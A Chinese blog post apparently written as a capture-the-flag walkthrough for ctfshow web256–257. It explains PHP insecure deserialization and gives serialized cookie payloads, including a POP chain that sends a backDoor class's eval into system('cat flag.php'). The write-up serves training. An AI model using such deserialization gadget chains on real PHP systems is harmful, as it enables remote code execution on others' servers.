web256-257

于 2023-07-01 23:04:44 发布
阅读量217 收藏
点赞数
分类专栏: 反序化 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49893996/article/details/131492384
版权 

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

对于上一题,这题关键点在于让username不等于password

因为在类中都是单独用===比较,所以只需要将username重新赋值就好,最后再序列化编码输出

<?php
class ctfShowUser{
    public $username = 'asdfgh';
    public $isVip=true;
}
$a= serialize(new ctfShowUser());
echo urlencode($a);
?>
//O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22asdfgh%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

最后如果没有cookie信息,就抓包后自行添加,然后GET方法传入username和password参数,就可以获得flag

web257

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

代码审计

这个源码一共定义了三个类:

ctfshowuser类

类中设定了四个私有属性(表示只有在当前类中才能使用)

使用了两个php魔术方法:

  • __construct(在类被实例化后自动调用)将 $class 属性设置为 info 类的实例。

  • __destruct()(在类被销毁时被自动调用) 指向class的getInfo() 方法。因为class已经被赋值为info类的实例,则表示当前类销毁时,调用info类中的getInfo() 方法

info类和baseDoor类

info类主要是定义了一个user的私有属性的初值,getinfo方法的目的是返回user属性值

backDoor类定义了一个私有属性code和一个公共方法getinfo,作用是eval代码执行

解题步骤

根据以上代码审计,我们知道,要获得flag就要使用backDoor类的getinfo方法,去造成代码执行

我们得知反序列化结束就会,调用getInfo方法,不过是info类中的getinfo方法

php反序列化不能改变类的方法,但是可以更改类的属性去达成我们的目的

简单的构造方法,就是把类复制,把该删的删掉剩下的改就行了

error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    #除了$class都用不到
    private $class = 'info';
    
    public function __construct(){
        $this->class=new info(); 
#因为我们要使用backDoor类的getinfo,所以我们可以将这里的info改为backDoor

    }
#无用
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}
#无用
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
#要用的类,通过控制$code的值造成,任意代码执行
class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
#最终代码
<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor(); 
#因为我们要使用backDoor类的getinfo,所以我们可以将这里的info改为backDoor
    }
}
#要用的类,通过控制$code的值造成,任意代码执行
class backDoor{
    private $code = 'system("cat flag.php");'; 或者使用tac

    }
echo urlencode(serialize(new ctfShowUser()));

?>

tac是cat的相反方法:

表示反序输出文件的内容,文件的最后一行显示在第一行,它可以对调试日志文件提供了很大的帮助,扭转日志内容的时间顺序。

一开始查看wp我也不知道为啥要用tac,不用cat。直到我坚持使用cat,结果页面没有回显

但是在最后回想起可能在源码中,结果真在,tac只是将最后一行作为第一行显示出来

tac的在最后一行

陈艺秋
关注
专栏目录
实战教程:如何在CentOS7中使用Docker部署Keepalived和Nginx构建高可用Web集群
jks212454的博客
07-09 273
实战教程:如何在CentOS7中使用Docker部署Keepalived和Nginx构建高可用Web集群
Web渗透测试实战:基于Metasploit 5.0
华章IT官方博客
03-28 4108
在当今快速发展的技术世界中,信息安全行业正以惊人的速度变化,与此同时,针对组织的网络攻击数量也在迅速增加。为了保护自己免受这些来自真实世界的攻击,许多组织在其流程管理中引入了安全审计以及风险和漏洞评估机制,旨在评估与其业务资产有关的风险。为了保护IT资产,许多组织聘请信息安全专业人员,以识别组织的应用程序和网络中可能存在的风险、漏洞和威胁。对于信息安全专业人员来说,掌握并...
CTFshow 反序列化 web256
Kradress的博客
12-19 435
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctfshow-web256(反序列化)
m0_62094846的博客
02-23 619
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
ctfshow反序列化web256
m0_62584974的博客
04-22 338
反序列化 Web256 题目有判断password和username相不相等 判断了才进行反序列化 <? //ctfshow 反序列化web256 class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 591
ctfshow web入门反序列化 web254-257
申请虚拟VISA卡ONEKEY保姆级教程来了!
最新发布
onekeycn的博客
05-29 8936
写在前面:本人之前为了亲自开通plus会员找了很多教程,发现目前的教程都有些不太详细,也踩了不少坑,所以为了广大酷友顺利用上强大的GPT4,我根据本人的开通经验做了一篇细致的教学。4.认证完成后,需要绑定 Google 身份验证器,才能开始使用,点击右上角3个点,选security,绑定google auth二次验证。值得一提的是——凡是中心化的产品都需要做KYC认证,这是合规必须要面临的动作,不必有过多的顾虑。5. 点击卡下方的top up,公测期间,充值至少20 USDC用于激活,目前只支持USDC。
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1426
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6058
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
Web安全期末复习
kaisaooo的博客
07-02 6353
目录前言知识点Web应用开发基础Web信息收集Web漏洞扫描SQL注入文件上传攻击跨站脚本攻击(XSS)跨站请求伪造命令执行漏洞Web Server配置安全认证和授权日志系统构建及日志分析实战与综合简答题复习要点ASP.NET的安全控件web应用系统的数据加密数据库安全通信身份验证日志分析安全配置一套习题 前言 本文用来记录Web安全的复习资料,大部分内容都是从老师ppt的复习范围中节选的,可能不太全,经过考试的心得:有时间的可以多看看,考的比较杂啥都有,但是SQL注入、XSS、文件上传漏洞是重中之重。有
360 OneKeyRoot 一键ROOT
06-14
360 OneKeyRoot 一键ROOT
OneKeyTools
12-07
PPT 设计优化工具,可以有效的缩短设计时间,简化设计,方便快捷
OneKey3.0最新版本
03-19
PPT模板风格软件 OneKey3.0版本 内含详细教程和安装方法
OneKey_6.zip
03-07
ghost备份软件,很好用的。我自己正在用。找了很久找到了的。还原也很放便,对备份文件有保护作用的。
OKO(OneKey Optimizer)
09-18
OKO(OneKey Optimizer)是专为联想电脑研发的新一代功能强大的系统优化软件,它能够为您的电脑进行体检,提升电脑性能,更新最新的固件、驱动和应用程序,并提供合理的电源管理方案,有效延长电池使用寿命
二十分钟速成海康视频接web系统
cmy0816的博客
09-10 1770
二十分钟速成海康视频接web系统 前几天有需求一个系统要接入海康视频,看着三十多页的开发指南…陷入了沉思。 为了解救广大同胞于水火之中,所以写了一个简单的小demo,便于快速接入。本demo只有一个功能(实时查看图像),但对于大部分系统来说,已经够用了。 需要引入依赖文件,一共有两个文件 jsencrypt.min.js和jsWebControl-1.0.0.min.js 如果是html的话,可以直接引入,但现在大多项目都是单页面应用,可以在public中的html中引入 开始进行实例化(这些代码
2023最新Onekey卡注册使用指南| Visa虚拟卡| U币充值|国内 支付场景实测
weixin_44013007的博客
05-17 7351
实测支付宝二维码支付以及小摊贩扫码均可,支持USDC充值,支持中国大陆身份证。
OK插件安装常见问题集锦(PowerPoint版)|OneKeyTools Lite安装说明
热门推荐
qq_34017390的博客
12-16 2万+
OneKeyTools Lite安装说明 (一)关于OneKeyTools Lite OneKeyTools Lite(轻简)版是由 @只为设计 个人独立开发的免费演示插件。Lite版分别支持微软Office 2007以上版本和WPS Office 2016以上版本,请根据自己需要下载相应版本 (二)支持软件 支持Microsoft Office 2007/2010/2013/2016/2019/365 (三)支持系统 支持Windows XP/Vista/7/8/8.1/10,不支持其他桌面或
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值